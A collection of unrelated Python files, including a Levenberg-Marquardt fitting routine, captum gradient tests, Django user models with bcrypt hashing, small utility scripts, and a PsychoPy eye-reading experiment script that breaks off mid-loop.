# Chilton,
# Didcot,
# Oxfordshire,
# OX11 0DE
# alun.morgan@diamond.ac.uk, michael.abbott@diamond.ac.uk
'''Gauss-Newton / Levenberg Marquardt nonlinear least squares'''
from numpy import arange, inner, zeros, dot, absolute, multiply
from numpy.linalg import solve
def diag_ix(N):
    '''Return an index pair selecting the main diagonal of an NxN matrix,
    suitable for fancy indexing (m[diag_ix(N)]).'''
    rows = arange(N)
    cols = arange(N)
    return rows, cols
def levmar_core(fdf, a, lam=1e-3, maxiter=10):
    '''Minimal Levenberg-Marquardt fit with fixed lambda and no termination
    test. Updates `a` in place and always runs `maxiter` iterations; use
    levmar() below for real work.'''
    n = len(a)
    d = (arange(n), arange(n))          # diagonal index of the Hessian estimate
    for _ in range(maxiter):
        e, de = fdf(a)                  # residuals and their derivatives
        beta = inner(de, e)             # (half) gradient vector
        alpha = inner(de, de)           # Gauss-Newton Hessian approximation
        alpha[d] *= 1 + lam             # damp the diagonal by lambda
        a -= solve(alpha, beta)         # take the damped Newton step
    return a
# Possible termination reasons for exit from levmar() routine. Lowest number is
# best: smaller codes correspond to stronger convergence guarantees.
LEVMAR_STATUS_CTOL = 0      # Absolute chi squared tolerance satisfied
LEVMAR_STATUS_FTOL = 1      # Relative chi squared tolerance satisfied
LEVMAR_STATUS_ITER = 2      # Max iterations exhausted
LEVMAR_STATUS_LAMBDA = 3    # Limit on lambda reached, convergence failed.
def levmar(f, df, a,
        ftol=1e-6, ctol=1e-6, lam=1e-3, maxiter=20, max_lambda=1e8):
    '''Levenberg-Marquardt non-linear optimisation. Takes three mandatory
    parameters and a handful of control parameters.

    f  A function taking an N dimensional vector and returning an M
       dimensional array representing the error function. The optimisation
       adjusts the parameter vector to minimise chi2 = sum(f(a)**2). Both
       arrays are one dimensional. f may return None to signal that the
       parameters are out of bounds.
    df A function taking an N dimensional vector and returning an NxM
       dimensional array of partial derivatives of f with respect to its
       input parameters (first dimension ranges over parameters).
    a  The initial starting point, an N dimensional vector.

    Returns a 4-tuple (the original docstring said 3-tuple) containing the
    optimal value for a, the corresponding chi2, the number of iterations
    (less one), and a status code:

        new_a, chi2, iter, status = levmar(f, df, a)

        LEVMAR_STATUS_CTOL = 0      Absolute chi squared tolerance satisfied
        LEVMAR_STATUS_FTOL = 1      Relative chi squared tolerance satisfied
        LEVMAR_STATUS_ITER = 2      Max iterations exhausted
        LEVMAR_STATUS_LAMBDA = 3    Limit on lambda reached, convergence failed.

    Termination control:
        ftol=1e-6   Fractional tolerance on chi2: stop when the fractional
                    reduction of chi2 is below ftol.
        ctol=1e-6   Absolute tolerance on chi2: stop when chi2 < ctol.
                    (The original doc claimed a default of 0.)
        maxiter=20  Maximum number of outer loops (evaluations of df()).
        lam=1e-3, max_lambda=1e8
                    Initial linearisation scaling factor and its ceiling.
    '''
    d = diag_ix(len(a))         # Diagonal index for updating alpha
    # Initial function and chi2.
    e = f(a)
    assert e is not None, 'Bad initial parameters'
    chi2 = (e ** 2).sum()
    # BUGFIX: xrange is Python 2 only; range behaves identically here.
    for iter in range(maxiter):
        # From the Jacobian compute alpha0, an estimate of the Hessian, and
        # beta, (half) the gradient vector.
        de = df(a)
        beta = inner(de, e)
        alpha0 = inner(de, de)
        # Zero any near-zero entries: denormal values here have been seen to
        # crash numpy's solver thread.
        beta = multiply(absolute(beta) > 1e-100, beta)
        alpha0 = multiply(absolute(alpha0) > 1e-100, alpha0)
        # Seek a lambda which actually improves chi2.
        while lam < max_lambda:
            alpha = +alpha0             # unary + copies the array
            alpha[d] *= 1 + lam         # damp the diagonal
            x = solve(alpha, beta)
            a_new = a - x
            e = f(a_new)
            if e is None:
                # Outside the boundary: increasing lam shrinks the step,
                # eventually bringing us back towards a.
                lam *= 10.
            else:
                chi2_new = (e ** 2).sum()
                if chi2_new > chi2:
                    # Worse. Try again closer to a with a more linear fit.
                    lam *= 10.
                else:
                    # Improvement found.
                    break
        else:
            # max_lambda reached. Give up now.
            return a, chi2, iter, LEVMAR_STATUS_LAMBDA
        a = a_new
        lam *= 0.1
        if chi2_new < ctol:
            return a, chi2_new, iter, LEVMAR_STATUS_CTOL
        elif chi2 - chi2_new < ftol * chi2_new:
            # Good enough: the fractional improvement is negligible.
            return a, chi2_new, iter, LEVMAR_STATUS_FTOL
        else:
            chi2 = chi2_new
    # Iterations exhausted.
    return a, chi2, iter, LEVMAR_STATUS_ITER
class FitError(Exception):
    '''Raised by fit() when Levenberg-Marquardt fails to converge
    (iterations exhausted or lambda runaway).'''
def fit(valid, function, derivative, initial, target, args, **kargs):
    '''Wrapper for the fitting process: fits function(params, *args) to
    `target` starting from `initial` and returns (best_params, chi2).

    valid(params)
        Returns true iff function can safely be called at params; pass None
        to skip validation.
    function(params, *args)
        Model evaluated at params; compared element-wise against target.
    derivative(params, *args)
        Jacobian of function, first dimension ranging over the parameters.
    initial
        Starting point for the parameter search.
    target
        Data array the model is fitted against.
    args
        Extra positional arguments forwarded to function()/derivative().
    **kargs
        Keyword arguments forwarded to levmar() to control convergence.

    Raises FitError when the fit fails to converge.
    '''
    def _residual(params):
        # None signals an out-of-bounds parameter set to levmar().
        if valid is not None and not valid(params):
            return None
        return function(params, *args) - target

    def _jacobian(params):
        return derivative(params, *args)

    result, chi2, _, status = levmar(_residual, _jacobian, initial, **kargs)
    if status == LEVMAR_STATUS_ITER:
        raise FitError('Iterations exhausted without an adequate fit')
    elif status == LEVMAR_STATUS_LAMBDA:
        raise FitError('Lambda runaway, fit failed')
    return result, chi2
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import collections
class HeadersDict(collections.MutableMapping):
    """
    A mapping class suitable as HTTP headers.

    All the keys are compared lower-case and with all the ``_``
    replaced by ``-``.

    NOTE(review): Python 2 only as written -- it references the ``unicode``
    builtin and ``collections.MutableMapping`` (moved to ``collections.abc``
    in Python 3 and removed from ``collections`` in 3.10).
    """
    def __init__(self, headers=None):
        # Internal store; keys are normalized by the dunder methods below.
        self.headers = {}
        if headers:
            self.update(headers)
    def __setitem__(self, key, value):
        # Values are stored as byte strings (latin-1, per HTTP/1.1 framing).
        if isinstance(value, unicode):
            value = value.encode('iso-8859-1')
        else:
            value = str(value)
        self.headers[key.replace('_', '-').lower()] = value
    def __getitem__(self, key):
        return self.headers[key.replace('_', '-').lower()]
    def __delitem__(self, key):
        del self.headers[key.replace('_', '-').lower()]
    def __iter__(self):
        return iter(self.headers)
    def __len__(self):
        return len(self.headers)
    def __contains__(self, key):
        return key.replace('_', '-').lower() in self.headers
    def __repr__(self):
        return repr(self.headers)
|
#!/usr/bin/env python3
from typing import cast
import torch
from torch import Tensor
from captum.attr._utils.gradient import (
apply_gradient_requirements,
compute_gradients,
compute_layer_gradients_and_eval,
undo_gradient_requirements,
)
from .helpers.basic_models import (
BasicModel,
BasicModel6_MultiTensor,
BasicModel_MultiLayer,
)
from .helpers.utils import BaseTest, assertArraysAlmostEqual
class Test(BaseTest):
    """Unit tests for captum's gradient utilities: requires_grad
    bookkeeping (apply/undo), plain input gradients, and layer-wise
    gradients and activations."""
    def test_apply_gradient_reqs(self) -> None:
        initial_grads = [False, True, False]
        test_tensor = torch.tensor([[6.0]], requires_grad=True)
        test_tensor.grad = torch.tensor([[7.0]])
        test_tensor_tuple = (torch.tensor([[5.0]]), test_tensor, torch.tensor([[7.0]]))
        out_mask = apply_gradient_requirements(test_tensor_tuple)
        # All tensors must now require grad, the mask must record the
        # original flags, and any existing .grad must be zeroed.
        for i in range(len(test_tensor_tuple)):
            self.assertTrue(test_tensor_tuple[i].requires_grad)
            self.assertEqual(out_mask[i], initial_grads[i])
            if test_tensor_tuple[i].grad is not None:
                self.assertAlmostEqual(
                    torch.sum(cast(Tensor, test_tensor_tuple[i].grad)).item(), 0.0
                )
    def test_undo_gradient_reqs(self) -> None:
        initial_grads = [False, True, False]
        test_tensor = torch.tensor([[6.0]], requires_grad=True)
        test_tensor.grad = torch.tensor([[7.0]])
        test_tensor_tuple = (
            torch.tensor([[6.0]], requires_grad=True),
            test_tensor,
            torch.tensor([[7.0]], requires_grad=True),
        )
        undo_gradient_requirements(test_tensor_tuple, initial_grads)
        # Original requires_grad flags must be restored, grads zeroed.
        for i in range(len(test_tensor_tuple)):
            self.assertEqual(test_tensor_tuple[i].requires_grad, initial_grads[i])
            if test_tensor_tuple[i].grad is not None:
                self.assertAlmostEqual(
                    torch.sum(cast(Tensor, test_tensor_tuple[i].grad)).item(), 0.0
                )
    def test_gradient_basic(self) -> None:
        model = BasicModel()
        input = torch.tensor([[5.0]], requires_grad=True)
        grads = compute_gradients(model, input)[0]
        assertArraysAlmostEqual(grads.squeeze(0).tolist(), [0.0], delta=0.01)
    def test_gradient_basic_2(self) -> None:
        model = BasicModel()
        input = torch.tensor([[-3.0]], requires_grad=True)
        grads = compute_gradients(model, input)[0]
        assertArraysAlmostEqual(grads.squeeze(0).tolist(), [1.0], delta=0.01)
    def test_gradient_multiinput(self) -> None:
        model = BasicModel6_MultiTensor()
        input1 = torch.tensor([[-3.0, -5.0]], requires_grad=True)
        input2 = torch.tensor([[-5.0, 2.0]], requires_grad=True)
        grads = compute_gradients(model, (input1, input2))
        assertArraysAlmostEqual(grads[0].squeeze(0).tolist(), [0.0, 1.0], delta=0.01)
        assertArraysAlmostEqual(grads[1].squeeze(0).tolist(), [0.0, 1.0], delta=0.01)
    def test_layer_gradient_linear0(self) -> None:
        model = BasicModel_MultiLayer()
        input = torch.tensor([[5.0, -11.0, 23.0]], requires_grad=True)
        grads, eval, _ = compute_layer_gradients_and_eval(
            model, model.linear0, input, target_ind=0
        )
        assertArraysAlmostEqual(
            grads[0].squeeze(0).tolist(), [4.0, 4.0, 4.0], delta=0.01
        )
        assertArraysAlmostEqual(
            eval[0].squeeze(0).tolist(), [5.0, -11.0, 23.0], delta=0.01
        )
    def test_layer_gradient_linear1(self) -> None:
        model = BasicModel_MultiLayer()
        input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
        grads, eval, _ = compute_layer_gradients_and_eval(
            model, model.linear1, input, target_ind=1
        )
        assertArraysAlmostEqual(
            grads[0].squeeze(0).tolist(), [0.0, 1.0, 1.0, 1.0], delta=0.01
        )
        assertArraysAlmostEqual(
            eval[0].squeeze(0).tolist(), [-2.0, 9.0, 9.0, 9.0], delta=0.01
        )
    def test_layer_gradient_linear1_inplace(self) -> None:
        # Same expectations as above must hold with inplace ReLU modules.
        model = BasicModel_MultiLayer(inplace=True)
        input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
        grads, eval, is_layer_tuple = compute_layer_gradients_and_eval(
            model, model.linear1, input, target_ind=1
        )
        assertArraysAlmostEqual(
            grads[0].squeeze(0).tolist(), [0.0, 1.0, 1.0, 1.0], delta=0.01
        )
        assertArraysAlmostEqual(
            eval[0].squeeze(0).tolist(), [-2.0, 9.0, 9.0, 9.0], delta=0.01
        )
        self.assertFalse(
            is_layer_tuple, ("Layer output should not be wrapped in " "a tuple.")
        )
    def test_layer_gradient_relu_input_inplace(self) -> None:
        model = BasicModel_MultiLayer(inplace=True)
        input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
        grads, eval, is_layer_tuple = compute_layer_gradients_and_eval(
            model, model.relu, input, target_ind=1, attribute_to_layer_input=True
        )
        assertArraysAlmostEqual(
            grads[0].squeeze(0).tolist(), [0.0, 1.0, 1.0, 1.0], delta=0.01
        )
        assertArraysAlmostEqual(
            eval[0].squeeze(0).tolist(), [-2.0, 9.0, 9.0, 9.0], delta=0.01
        )
        self.assertTrue(is_layer_tuple, "Layer input should be wrapped in a tuple.")
    def test_layer_gradient_output(self) -> None:
        model = BasicModel_MultiLayer()
        input = torch.tensor([[5.0, 2.0, 1.0]], requires_grad=True)
        grads, eval, _ = compute_layer_gradients_and_eval(
            model, model.linear2, input, target_ind=1
        )
        assertArraysAlmostEqual(grads[0].squeeze(0).tolist(), [0.0, 1.0], delta=0.01)
        assertArraysAlmostEqual(eval[0].squeeze(0).tolist(), [26.0, 28.0], delta=0.01)
|
from .load import scHiCs
from .analysis import kmeans, spectral_clustering, HAC
from .analysis import scatter, interactive_scatter
from .embedding import PCA, MDS, tSNE, SpectralEmbedding, PHATE
|
# Termux terminal colors (ANSI escape sequences)
birutua = "\033[0;34m"   # dark blue
putih = "\033[0m"        # "white": actually the reset/default attribute
kuning = "\033[1;33m"    # yellow (bold)
hijau = "\033[1;32m"     # green (bold)
merah = "\033[1;31m"     # red (bold)
biru = "\033[0;36m"      # "blue": cyan escape code
ungu = "\033[1;35m"      # purple (bold)
|
from __future__ import unicode_literals
from django.db import models
import re
import bcrypt
# Create your models here.
class UserManager(models.Manager):
    """Validation helpers for registration and login.

    Both validators return a dict of error messages keyed by field; on
    success the dict instead carries the created user ('new_user') or the
    authenticated user ('user').
    """
    def basic_validator(self, postData):
        # Registration validation; creates (and hashes the password of) the
        # user when every check passes.
        errors = {}
        # NOTE(review): the check requires >= 3 chars but the message says
        # "at least 2" -- confirm which is intended before changing either.
        if len(postData['name']) < 3:
            errors["name"] = "name must be at least 2 chars"
        if len(postData['username']) < 1:
            errors["username"] = "username cannot be blank"
        if len(User.objects.filter(username = postData['username'])) > 0:
            errors["username"] = "username taken"
        if len(postData['password']) < 8:
            errors["password"] = "password must be at least 8 characters"
        if len(postData['confirm']) < 1:
            errors["confirm"] = "confirm cannot be blank"
        if not postData['password'] == postData['confirm']:
            errors["password"] = "passwords must match"
        if len(errors) == 0:
            # Hash with a fresh salt before storing; plain text never persists.
            hash_pw = bcrypt.hashpw(postData['password'].encode(), bcrypt.gensalt())
            new_user = User.objects.create(name = postData['name'], username = postData['username'], password = hash_pw, date = postData['date'])
            errors['new_user'] = new_user
        return errors
    def login_validator(self, postData):
        # Login validation: look the user up by username and check the
        # bcrypt hash of the submitted password.
        errors = {}
        hash1 = User.objects.filter(username = postData['username'])
        if hash1:
            if bcrypt.checkpw(postData['login_password'].encode(), hash1[0].password.encode()):
                errors['user'] = hash1[0]
            else:
                errors['invalid_password'] = "invalid password"
        else:
            errors['no_email'] = "invalid username"
        return errors
class User(models.Model):
    """Application user with a bcrypt-hashed password (custom auth, not
    django.contrib.auth). Validation lives in UserManager."""
    name = models.CharField(max_length = 100)
    username = models.CharField(max_length = 100)
    password = models.CharField(max_length = 100)  # bcrypt hash
    date = models.DateField(default = "")
    created_at = models.DateTimeField(auto_now_add = True)
    objects = UserManager()
class Item(models.Model):
    """A wished-for item: one creator owns it, any number of users may
    add it to their wishlist."""
    name = models.CharField(max_length = 100)
    # on_delete is mandatory from Django 2.0; CASCADE matches the implicit
    # default that older Django versions applied here.
    creator = models.ForeignKey(User, related_name = "items", on_delete = models.CASCADE)
    wishlists = models.ManyToManyField(User, related_name = "wishlist")
    created_at = models.DateTimeField(auto_now_add = True)
|
import numpy as np
import matplotlib.pyplot as plt

# Plot actual vs. predicted per-stage times for several memory configurations.
fig, ax = plt.subplots()
x=range(2)
# Series: each list holds the time (s) for the two stages.
y=[214, 17]
y1=[188 , 31 ]
y2=[213 , 13 ]
y3=[175 , 19 ]
y4=[205 , 10]
plt.axis([-0.2, 1.2, 0, 250])
ax.set_xticks(x)
ax.tick_params('both',direction='in', which='both', pad=1, bottom = 'on', top = 'on', left = 'on', right = 'on', labelcolor='black')
ax.yaxis.grid(color='grey', linestyle='-', linewidth=1, alpha=0.5)
ax.xaxis.grid(color='white', linestyle='', linewidth=1, alpha=1)
#ax.set_xticklabels( [-20, 0, 20,40, 80, 120, 160, 200, 400, 600, 800, 1000, 3000, 5000], fontproperties=font)
plt.plot(x,y,label='Actual',linewidth=2, color='r', marker='x', ms=15, markeredgewidth=3)
plt.plot(x,y1,label='7.5GB',linewidth=2, color='g', marker='^', ms=12, fillstyle='none',markeredgewidth=3)
plt.plot(x,y2,label='15GB',linewidth=2, color='b', marker='o', ms=12, fillstyle='none',markeredgewidth=3)
plt.plot(x,y3,label='1.25GB',linewidth=2, color='m', marker='s', ms=12, fillstyle='none',markeredgewidth=3)
plt.plot(x,y4,label='2.5GB',linewidth=2, color='black', marker='+', ms=15, markeredgewidth=3)
plt.xlabel('Stage')
plt.ylabel('Time (s)',fontsize=30)
#plt.title('Stage Actual time VS predict time',fontsize=40)
#plt.xticks(index + bar_width, range(2),fontsize=30)
#plt.ylim(0,40)
# Global font bump applies to ticks/labels rendered after this point.
plt.rcParams['font.size'] = 30
#plt.rc('ytick', labelsize=10)
#ax.get_yticklabels().set_fontsize(30)
plt.legend(fontsize=30,frameon=False,labelspacing=0,columnspacing=0,borderpad=0)
#plt.tight_layout()
#plt.grid(True,which='both', color='0.0')
plt.show()
|
def _read_dict(count_prompt):
    """Prompt for a count, then that many integer key/value pairs; return the dict."""
    result = {}
    for _ in range(int(input(count_prompt))):
        k = int(input("Enter the key : "))
        v = int(input("Enter the value : "))
        result[k] = v
    return result

# Build both dictionaries from user input and compare them.
d1 = _read_dict("Enter the number of values in dictionary 1: ")
d2 = _read_dict("Enter the number of values in dictionary 2 : ")
print('The dictionaries are same' if d1 == d2 else "The dictionaries are not equal")
|
def count_vowels(text):
    """Return the number of vowels (a, e, i, o, u) in *text*, case-insensitively.

    :param text: any string
    :return: int count of vowel characters
    """
    return sum(1 for ch in text.lower() if ch in "aeiou")

if __name__ == "__main__":
    s = input("Enter any string:")
    # BUG FIX: the loop counted every vowel but the message claimed to count
    # only 'o'; report what is actually counted.
    print("number of vowels:", count_vowels(s))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Fri Jan 17 14:46:44 2014
If you publish work using this script please cite the relevant PsychoPy publications
Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
from __future__ import division #so that 1/3=0.333 instead of 1/3=0
from psychopy import visual, core, data, event, logging, gui
from psychopy.constants import * #things like STARTED, FINISHED
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray
from numpy.random import random, randint, normal, shuffle
import os #handy system and path functions
#store info about the experiment session
expName='RMET_skeleton'#from the Builder filename that created this script
expInfo={'participant':'','group':'pilot', 'session':'001'}
dlg=gui.DlgFromDict(dictionary=expInfo,title=expName)
if dlg.OK==False: core.quit() #user pressed cancel
expInfo['date']=data.getDateStr()#add a simple timestamp
expInfo['expName']=expName
#data file path: data/<group>_<participant>_<session>
filename='data' + os.path.sep + '%s_%s_%s' %(expInfo['group'], expInfo['participant'], expInfo['session'])
logging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file
#an ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
    extraInfo=expInfo, runtimeInfo=None,
    originPath=None,
    savePickle=True, saveWideText=False,
    dataFileName=filename)
#NOTE(review): opened in append mode, so the column header below is re-written
#on every run of the same participant/session -- confirm intended.
datFile=open(filename+'.txt','a')
datFile.write('Trial\tpicID\tanswer\thit\tRT\n')
#setup the Window
win = visual.Window(size=(1440, 900), fullscr=True, screen=0, allowGUI=False, allowStencil=False,
    monitor=u'testMonitor', color=u'white', colorSpace=u'rgb')
#Initialise components for Routine "instr"
instrClock=core.Clock()
instructions=visual.TextStim(win=win, ori=0, name='instructions',
    text="For each set of eyes, select the number corresponding to the word that best describes what the person in the picture is thinking or feeling. You may feel that more than one word is applicable, but please choose just one word, the word which you consider to be most suitable. Before making your choice, make sure that you have read all 4 words. You should try to do the task as quickly as possible but you will not be timed. Press 'enter' to begin.",
    font='Arial',
    pos=[0, 0], height=0.05,wrapWidth=None,
    color='black', colorSpace='rgb', opacity=1,
    depth=0.0)
#Initialise components for Routine "pract"
practClock=core.Clock()
#Practice trial: fixed image with one candidate word in each screen corner.
practice=visual.PatchStim(win=win, name='practice',
    tex='stimuli/pic00.jpg', mask=None,
    ori=0, pos=[0, 0], size=[0.5, 0.5], sf=None, phase=0.0,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    texRes=128, interpolate=True, depth=0.0)
pract_w1=visual.TextStim(win=win, ori=0, name='pract_w1',
    text='jealous',
    font='Arial',
    pos=[-0.5, 0.5], height=0.1,wrapWidth=None,
    color='black', colorSpace='rgb', opacity=1,
    depth=-1.0)
pract_w2=visual.TextStim(win=win, ori=0, name='pract_w2',
    text='panicked',
    font='Arial',
    pos=[0.5, 0.5], height=0.1,wrapWidth=None,
    color='black', colorSpace='rgb', opacity=1,
    depth=-2.0)
pract_w3=visual.TextStim(win=win, ori=0, name='pract_w3',
    text='arrogant',
    font='Arial',
    pos=[-0.5, -0.5], height=0.1,wrapWidth=None,
    color='black', colorSpace='rgb', opacity=1,
    depth=-3.0)
pract_w4=visual.TextStim(win=win, ori=0, name='pract_w4',
    text='hateful',
    font='Arial',
    pos=[0.5, -0.5], height=0.1,wrapWidth=None,
    color='black', colorSpace='rgb', opacity=1,
    depth=-4.0)
#Initialise components for Routine "trial"
#Placeholders; image and words are set per-trial from the conditions file.
trialClock=core.Clock()
stimulus=visual.PatchStim(win=win, name='stimulus',
    tex='sin', mask=None,
    ori=0, pos=[0, 0], size=[0.5, 0.5], sf=None, phase=0.0,
    color=[1,1,1], colorSpace='rgb', opacity=1,
    texRes=128, interpolate=True, depth=0.0)
trial_word1=visual.TextStim(win=win, ori=0, name='trial_word1',
    text='nonsense',
    font=u'Arial',
    pos=[-0.5, 0.5], height=0.1,wrapWidth=None,
    color=u'black', colorSpace=u'rgb', opacity=1,
    depth=-1.0)
trial_word2=visual.TextStim(win=win, ori=0, name='trial_word2',
    text='nonsense',
    font=u'Arial',
    pos=[0.5, 0.5], height=0.1,wrapWidth=None,
    color=u'black', colorSpace=u'rgb', opacity=1,
    depth=-2.0)
trial_word3=visual.TextStim(win=win, ori=0, name='trial_word3',
    text='nonsense',
    font=u'Arial',
    pos=[-0.5, -0.5], height=0.1,wrapWidth=None,
    color=u'black', colorSpace=u'rgb', opacity=1,
    depth=-3.0)
trial_word4=visual.TextStim(win=win, ori=0, name='trial_word4',
    text='nonsense',
    font=u'Arial',
    pos=[0.5, -0.5], height=0.1,wrapWidth=None,
    color=u'black', colorSpace=u'rgb', opacity=1,
    depth=-4.0)
# Create some handy timers
globalClock=core.Clock() #to track the time since experiment started
routineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine
#------Prepare to start Routine"instr"-------
#Shows the instruction text until the participant presses 'enter'.
t=0; instrClock.reset() #clock
frameN=-1
#update component parameters for each repeat
instr_resp = event.BuilderKeyResponse() #create an object of type KeyResponse
instr_resp.status=NOT_STARTED
#keep track of which components have finished
instrComponents=[]
instrComponents.append(instructions)
instrComponents.append(instr_resp)
for thisComponent in instrComponents:
    if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED
#-------Start Routine "instr"-------
continueRoutine=True
while continueRoutine:
    #get current time
    t=instrClock.getTime()
    frameN=frameN+1#number of completed frames (so 0 in first frame)
    #update/draw components on each frame
    #*instructions* updates
    if t>=0.0 and instructions.status==NOT_STARTED:
        #keep track of start time/frame for later
        instructions.tStart=t#underestimates by a little under one frame
        instructions.frameNStart=frameN#exact frame index
        instructions.setAutoDraw(True)
    #*instr_resp* updates
    if t>=0.0 and instr_resp.status==NOT_STARTED:
        #keep track of start time/frame for later
        instr_resp.tStart=t#underestimates by a little under one frame
        instr_resp.frameNStart=frameN#exact frame index
        instr_resp.status=STARTED
        #keyboard checking is just starting
        instr_resp.clock.reset() # now t=0
        event.clearEvents()
    if instr_resp.status==STARTED:#only update if being drawn
        theseKeys = event.getKeys(keyList=['return'])
        if len(theseKeys)>0:#at least one key was pressed
            instr_resp.keys=theseKeys[-1]#just the last key pressed
            instr_resp.rt = instr_resp.clock.getTime()
            #abort routine on response
            continueRoutine=False
    #check if all components have finished
    if not continueRoutine: #a component has requested that we end
        routineTimer.reset() #this is the new t0 for non-slip Routines
        break
    continueRoutine=False#will revert to True if at least one component still running
    for thisComponent in instrComponents:
        if hasattr(thisComponent,"status") and thisComponent.status!=FINISHED:
            continueRoutine=True; break#at least one component has not yet finished
    #check for quit (the [Esc] key)
    if event.getKeys(["escape"]):
        core.quit()
    #refresh the screen
    if continueRoutine:#don't flip if this routine is over or we'll get a blank screen
        win.flip()
#End of Routine "instr"
for thisComponent in instrComponents:
    if hasattr(thisComponent,"setAutoDraw"): thisComponent.setAutoDraw(False)
#------Prepare to start Routine"pract"-------
#Practice trial: fixed picture plus four candidate words; accepts keys 1-4.
t=0; practClock.reset() #clock
frameN=-1
#update component parameters for each repeat
pract_resp = event.BuilderKeyResponse() #create an object of type KeyResponse
pract_resp.status=NOT_STARTED
#keep track of which components have finished
practComponents=[]
practComponents.append(practice)
practComponents.append(pract_w1)
practComponents.append(pract_w2)
practComponents.append(pract_w3)
practComponents.append(pract_w4)
practComponents.append(pract_resp)
for thisComponent in practComponents:
    if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED
#-------Start Routine "pract"-------
continueRoutine=True
while continueRoutine:
    #get current time
    t=practClock.getTime()
    frameN=frameN+1#number of completed frames (so 0 in first frame)
    #update/draw components on each frame
    #*practice* updates
    if t>=0.0 and practice.status==NOT_STARTED:
        #keep track of start time/frame for later
        practice.tStart=t#underestimates by a little under one frame
        practice.frameNStart=frameN#exact frame index
        practice.setAutoDraw(True)
    #*pract_w1* updates
    if t>=0.0 and pract_w1.status==NOT_STARTED:
        #keep track of start time/frame for later
        pract_w1.tStart=t#underestimates by a little under one frame
        pract_w1.frameNStart=frameN#exact frame index
        pract_w1.setAutoDraw(True)
    #*pract_w2* updates
    if t>=0.0 and pract_w2.status==NOT_STARTED:
        #keep track of start time/frame for later
        pract_w2.tStart=t#underestimates by a little under one frame
        pract_w2.frameNStart=frameN#exact frame index
        pract_w2.setAutoDraw(True)
    #*pract_w3* updates
    if t>=0.0 and pract_w3.status==NOT_STARTED:
        #keep track of start time/frame for later
        pract_w3.tStart=t#underestimates by a little under one frame
        pract_w3.frameNStart=frameN#exact frame index
        pract_w3.setAutoDraw(True)
    #*pract_w4* updates
    if t>=0.0 and pract_w4.status==NOT_STARTED:
        #keep track of start time/frame for later
        pract_w4.tStart=t#underestimates by a little under one frame
        pract_w4.frameNStart=frameN#exact frame index
        pract_w4.setAutoDraw(True)
    #*pract_resp* updates
    if t>=0.0 and pract_resp.status==NOT_STARTED:
        #keep track of start time/frame for later
        pract_resp.tStart=t#underestimates by a little under one frame
        pract_resp.frameNStart=frameN#exact frame index
        pract_resp.status=STARTED
        #keyboard checking is just starting
        pract_resp.clock.reset() # now t=0
        event.clearEvents()
    if pract_resp.status==STARTED:#only update if being drawn
        theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])
        if len(theseKeys)>0:#at least one key was pressed
            pract_resp.keys=theseKeys[-1]#just the last key pressed
            pract_resp.rt = pract_resp.clock.getTime()
            #was this 'correct'?
            #BUG FIX: the original compared against str("'2'"), which is the
            #5-character string "'2'" (quotes included) and can never equal the
            #'2' returned by event.getKeys(), so corr was always 0.
            if (pract_resp.keys=='2'): pract_resp.corr=1
            else: pract_resp.corr=0
            #abort routine on response
            continueRoutine=False
    #check if all components have finished
    if not continueRoutine: #a component has requested that we end
        routineTimer.reset() #this is the new t0 for non-slip Routines
        break
    continueRoutine=False#will revert to True if at least one component still running
    for thisComponent in practComponents:
        if hasattr(thisComponent,"status") and thisComponent.status!=FINISHED:
            continueRoutine=True; break#at least one component has not yet finished
    #check for quit (the [Esc] key)
    if event.getKeys(["escape"]):
        core.quit()
    #refresh the screen
    if continueRoutine:#don't flip if this routine is over or we'll get a blank screen
        win.flip()
#End of Routine "pract"
for thisComponent in practComponents:
    if hasattr(thisComponent,"setAutoDraw"): thisComponent.setAutoDraw(False)
#set up handler to look after randomisation of conditions etc
#NOTE(review): seed=int(expInfo['participant']) raises ValueError if the
#participant field is left blank or non-numeric -- confirm acceptable.
trials=data.TrialHandler(nReps=1, method=u'random',
    extraInfo=expInfo, originPath=None,
    trialList=data.importConditions('conditions.xlsx'),
    seed=int(expInfo['participant']), name='trials')
thisExp.addLoop(trials)#add the loop to the experiment
thisTrial=trials.trialList[0]#so we can initialise stimuli with some values
#abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)
#NOTE(review): exec-based injection of condition columns (stim, word1..word4,
#correctResponse) into module globals -- standard Builder output, but fragile.
if thisTrial!=None:
    for paramName in thisTrial.keys():
        exec(paramName+'=thisTrial.'+paramName)
for thisTrial in trials:
    currentLoop = trials
    #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)
    if thisTrial!=None:
        for paramName in thisTrial.keys():
            exec(paramName+'=thisTrial.'+paramName)
    #------Prepare to start Routine"trial"-------
    t=0; trialClock.reset() #clock
    frameN=-1
    #update component parameters for each repeat
    stimulus.setImage(stim)
    trial_word1.setText(word1)
    trial_word2.setText(word2)
    trial_word3.setText(word3)
    trial_word4.setText(word4)
    key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse
    key_resp.status=NOT_STARTED
    #keep track of which components have finished
    trialComponents=[]
    trialComponents.append(stimulus)
    trialComponents.append(trial_word1)
    trialComponents.append(trial_word2)
    trialComponents.append(trial_word3)
    trialComponents.append(trial_word4)
    trialComponents.append(key_resp)
    for thisComponent in trialComponents:
        if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED
    #-------Start Routine "trial"-------
    continueRoutine=True
    while continueRoutine:
        #get current time
        t=trialClock.getTime()
        frameN=frameN+1#number of completed frames (so 0 in first frame)
        #update/draw components on each frame
        #*stimulus* updates
        if t>=0.0 and stimulus.status==NOT_STARTED:
